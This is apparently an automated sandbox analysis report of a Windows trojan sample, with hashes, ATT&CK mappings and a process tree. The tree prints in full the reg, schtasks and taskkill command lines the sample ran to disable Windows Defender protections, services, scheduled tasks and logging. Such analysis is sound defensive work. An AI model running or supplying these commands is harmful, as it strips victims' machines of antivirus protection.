448c916483d9a19490c29bbd8286ff297d8fa1828f5626deebc82ea605e66928

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-09-2024 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe
Size

90KB
MD5

025e0b547c344ac713a7284e17feaca7
SHA1

8272182126be5918c63e02813b60bc4a0cfecedd
SHA256

448c916483d9a19490c29bbd8286ff297d8fa1828f5626deebc82ea605e66928
SHA512

157428402028baa6c8f9d3f9c5a470b2f50369067374a8627e4c81accc925210c36dab0afd6d0e94e9f3aea37e4d0a4a1568c32c30d3c1882da55a19a75152c1
SSDEEP

1536:o7f9h0UPJP/CpICdikMLMLv5PFNg1qrX+VIOlnToIf7gIxsV3M3aOn:mliUPXC8k1nJrX+fNTBfnyM3Z

Score

10^/10

defense_evasion discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
2652	taskkill.exe
2900	taskkill.exe
1816	taskkill.exe
3068	taskkill.exe
600	taskkill.exe
548	taskkill.exe
2636	taskkill.exe
896	taskkill.exe
1500	taskkill.exe
820	taskkill.exe
2132	taskkill.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	2900	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	896	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	2132	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2968 wrote to memory of 2964	2968	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe	30
PID 2968 wrote to memory of 2964	2968	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe	30
PID 2968 wrote to memory of 2964	2968	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe	30
PID 2968 wrote to memory of 2964	2968	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe	30
PID 2964 wrote to memory of 2652	2964	cmd.exe	32
PID 2964 wrote to memory of 2652	2964	cmd.exe	32
PID 2964 wrote to memory of 2652	2964	cmd.exe	32
PID 2964 wrote to memory of 2900	2964	cmd.exe	34
PID 2964 wrote to memory of 2900	2964	cmd.exe	34
PID 2964 wrote to memory of 2900	2964	cmd.exe	34
PID 2964 wrote to memory of 2636	2964	cmd.exe	35
PID 2964 wrote to memory of 2636	2964	cmd.exe	35
PID 2964 wrote to memory of 2636	2964	cmd.exe	35
PID 2964 wrote to memory of 1816	2964	cmd.exe	36
PID 2964 wrote to memory of 1816	2964	cmd.exe	36
PID 2964 wrote to memory of 1816	2964	cmd.exe	36
PID 2964 wrote to memory of 3068	2964	cmd.exe	37
PID 2964 wrote to memory of 3068	2964	cmd.exe	37
PID 2964 wrote to memory of 3068	2964	cmd.exe	37
PID 2964 wrote to memory of 600	2964	cmd.exe	38
PID 2964 wrote to memory of 600	2964	cmd.exe	38
PID 2964 wrote to memory of 600	2964	cmd.exe	38
PID 2964 wrote to memory of 896	2964	cmd.exe	39
PID 2964 wrote to memory of 896	2964	cmd.exe	39
PID 2964 wrote to memory of 896	2964	cmd.exe	39
PID 2964 wrote to memory of 1500	2964	cmd.exe	40
PID 2964 wrote to memory of 1500	2964	cmd.exe	40
PID 2964 wrote to memory of 1500	2964	cmd.exe	40
PID 2964 wrote to memory of 548	2964	cmd.exe	41
PID 2964 wrote to memory of 548	2964	cmd.exe	41
PID 2964 wrote to memory of 548	2964	cmd.exe	41
PID 2964 wrote to memory of 820	2964	cmd.exe	42
PID 2964 wrote to memory of 820	2964	cmd.exe	42
PID 2964 wrote to memory of 820	2964	cmd.exe	42
PID 2964 wrote to memory of 2132	2964	cmd.exe	43
PID 2964 wrote to memory of 2132	2964	cmd.exe	43
PID 2964 wrote to memory of 2132	2964	cmd.exe	43
PID 2964 wrote to memory of 2404	2964	cmd.exe	44
PID 2964 wrote to memory of 2404	2964	cmd.exe	44
PID 2964 wrote to memory of 2404	2964	cmd.exe	44
PID 2964 wrote to memory of 2128	2964	cmd.exe	45
PID 2964 wrote to memory of 2128	2964	cmd.exe	45
PID 2964 wrote to memory of 2128	2964	cmd.exe	45
PID 2964 wrote to memory of 2600	2964	cmd.exe	46
PID 2964 wrote to memory of 2600	2964	cmd.exe	46
PID 2964 wrote to memory of 2600	2964	cmd.exe	46
PID 2964 wrote to memory of 2984	2964	cmd.exe	47
PID 2964 wrote to memory of 2984	2964	cmd.exe	47
PID 2964 wrote to memory of 2984	2964	cmd.exe	47
PID 2964 wrote to memory of 2988	2964	cmd.exe	48
PID 2964 wrote to memory of 2988	2964	cmd.exe	48
PID 2964 wrote to memory of 2988	2964	cmd.exe	48
PID 2964 wrote to memory of 2980	2964	cmd.exe	49
PID 2964 wrote to memory of 2980	2964	cmd.exe	49
PID 2964 wrote to memory of 2980	2964	cmd.exe	49
PID 2964 wrote to memory of 3056	2964	cmd.exe	50
PID 2964 wrote to memory of 3056	2964	cmd.exe	50
PID 2964 wrote to memory of 3056	2964	cmd.exe	50
PID 2964 wrote to memory of 3040	2964	cmd.exe	51
PID 2964 wrote to memory of 3040	2964	cmd.exe	51
PID 2964 wrote to memory of 3040	2964	cmd.exe	51
PID 2964 wrote to memory of 3060	2964	cmd.exe	52
PID 2964 wrote to memory of 3060	2964	cmd.exe	52
PID 2964 wrote to memory of 3060	2964	cmd.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\63A3.tmp\63A4.tmp\63A5.bat C:\Users\Admin\AppData\Local\Temp\025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM ati_service.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sihost32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sihost86.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sihost64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM nslookup.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM MSVSCService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:600
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM mscvs.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:896
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM test.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM VSC_Host_Service.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:548
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM darkgenerationminer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM nslookup.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2132
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:2404
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:2128
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:2600
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:2984
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2988
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2980
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3056
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3040
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3060
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:2820
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:2460
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:2604
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1824
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1264
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:316
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:2040
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:2656
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:2076
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:2228
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:2448
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:2312
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1312
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1508
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:644
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:692
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:1164
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:1820
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:1740
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:1404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\63A3.tmp\63A4.tmp\63A5.bat

Filesize
4KB

MD5
6c45ca3f949cec63659fd6809bfe9c79

SHA1
240b7260d8d6067fd15c26b4441e1e306b68ce35

SHA256
655f29b19c8b32fea16a991b5bf7c73f3b03a43b8486781f9e9e55f392c21238

SHA512
0c42e5e038c92dddf9a5f29fc2dd5b38a0c9207f92050a10a9968acb18a0ba3f468c61217bf8881775c93ead8790fc299c0c316bfd9fee037040d2a177c212da

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads